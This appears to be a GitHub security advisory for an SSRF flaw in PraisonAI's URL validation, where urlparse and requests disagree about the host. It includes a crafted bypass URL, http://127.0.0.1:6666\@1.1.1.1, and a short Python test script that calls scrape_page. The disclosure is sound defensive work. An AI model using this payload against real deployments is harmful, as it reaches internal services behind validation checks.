The URL checking logic in PraisonAI has a logical flaw that could be bypassed by attackers, leading to SSRF attacks.
The current PraisonAI project uses validateurl to validate the input URL. The main logic is to perform security checks on the host portion of the URL extracted by urlparse to prevent SSRF attacks.
<img width="1290" height="1145" alt="QQ20260424-151256-24-1" src="https://github.com/user-attachments/assets/d5f16b74-5ad2-444f-8600-b05f78a4b769" />
However, there are indeed differences in parsing between urlparse and the library that actually sends the request. Currently, almost all application scenarios in this project involve first using validateurl for URL validation, and then using getsession().get to send the request.
<img width="1143" height="740" alt="QQ20260424-151437-24-2" src="https://github.com/user-attachments/assets/b1bf6ec2-d32a-4dac-b814-da819e8d3c83" />
In reality, its underlying mechanism is requests.get.
<img width="1042" height="576" alt="QQ20260424-151645-24-3" src="https://github.com/user-attachments/assets/e17352c3-4205-44d6-ab6e-75566480215b" />
The core issue: urlparse() and requests disagree on which host a URL like http://127.0.0.1:6666\@1.1.1.1 points to:
urlparse() treats \ as a regular character and @ as the userinfo-host delimiter, so it extracts hostname as 1.1.1.1 (public)requests treats \ as a path character, connecting to 127.0.0.1 (internal)Below is a test code I wrote following the code.
import sys
from pathlib import Path
from pprint import pprint
sys.path.insert(0, str(Path(r"D:/BaiduNetdiskDownload/PraisonAI-main/PraisonAI-main/src/praisonai-agents")))
from praisonaiagents.tools import spider_tools
# url = "http://127.0.0.1:6666\@1.1.1.1"
url = "http://127.0.0.1:6666"
result = spider_tools.scrape_page(url)
if isinstance(result, dict) and "error" in result:
print("scrape failed:", result["error"])
else:
pprint(result)
When an attacker uses http://127.0.0.1:6666/, the existing detection logic can detect that this is an internal network address and block it.
<img width="1068" height="128" alt="QQ20260424-152007-24-4" src="https://github.com/user-attachments/assets/294bff10-2af6-4960-bf69-dbf3340b1e9b" />
However, when an attacker uses http://127.0.0.1:6666\@1.1.1.1, the detection logic resolves the host to 1.1.1.1, which is a public IP address, thus passing the verification. But in the actual request process, this URL is forwarded by requests.get to http://127.0.0.1:6666, bypassing the detection and achieving an SSRF attack.
<img width="2089" height="324" alt="QQ20260424-152123-24-5" src="https://github.com/user-attachments/assets/4421ce42-e47b-48de-a97a-56ce56a2bbc9" />
http://127.0.0.1:6666\@1.1.1.1
SSRF
{
"github_reviewed_at": "2026-05-06T22:08:11Z",
"github_reviewed": true,
"cwe_ids": [
"CWE-918"
],
"nvd_published_at": "2026-05-08T14:16:46Z",
"severity": "HIGH"
}